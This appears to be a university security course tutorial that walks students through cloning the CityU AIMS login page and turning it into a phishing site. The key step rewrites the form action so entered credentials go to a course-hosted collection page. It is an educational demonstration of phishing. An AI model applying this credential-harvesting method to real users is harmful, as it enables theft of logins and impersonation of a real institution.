
Tutorial 2

Internet Security
GE2338 Internet Applications and Security

All the teaching materials of this course are for educational purposes only. They should not be abused. The course leader and lecturer of this course are not responsible for any damage or legal issue that you may create.
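Building a Phishing Website
[Figure: a User, a Phishing CityU AIMS Website, and the Actual CityU AIMS Website. The phishing website holds a table with columns Student ID and Password (sample row: 12345678, abc).]
1: Enter EID and Password (User to Phishing CityU AIMS Website)
2: Redirect to https://banweb.cityu.edu.hk/pls/PROD/twgkpswd_cityu.P_WWWLogin
3: Show a login page (Actual CityU AIMS Website to User)

GE2338 © By Dr. Chi-Yin Chow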
Step 1: Copy Web Interface (1/3)
Open Google Chrome
Go to CityU AIMS login page



Step 1: Copy Web Interface (2/3)
Click the top-right “Customize and
control Google Chrome” icon
Select “More tools”
Select “Save page as…”



Step 1: Copy Web Interface (3/3)
Select C:\temp directory
Type index.htm as File name
Select “Webpage, Complete”
as Save as type
Click “Save” button



Step 2: Browse index.htm
Open Google Chrome to browse the saved index.htm file (drag and drop the
index.htm to Google Chrome)
Only the favicon is missing



Step 3: Copy Favicon (1/3)
View the favicon at https://template.cityu.edu.hk/favicon.ico
Right click the icon and
select “Save image as...”
Select C:\temp\index_files\ and
click “Save” button



Step 3: Copy Favicon (2/3)
Use Notepad to open index.htm
Copy <link rel="icon" type="image/x-icon" href="index_files/favicon.ico" />
and paste it after <head>
Press Ctrl-S to save the file



Step 3: Copy Favicon (3/3)
Refresh the index.htm to
display the favicon



Step 4: Revise the HTML Form
Use Notepad to search for <form
Change
action="https://banweb.cityu.edu.hk/pls/PROD/twgkpswd_cityu.P_WWWLogin"
to action="https://www.cs.cityu.edu.hk/~kclee/GE2338/phish/"



Step 5: Testing (1/2)
Refresh the index.htm
Enter your EID and make up a password (DO NOT use your real password)
Click Login button



Step 5: Testing (2/2)
Go to https://www.cs.cityu.edu.hk/~kclee/GE2338/phish/
You can see your input EID and password
(To protect privacy, some characters are deliberately removed)
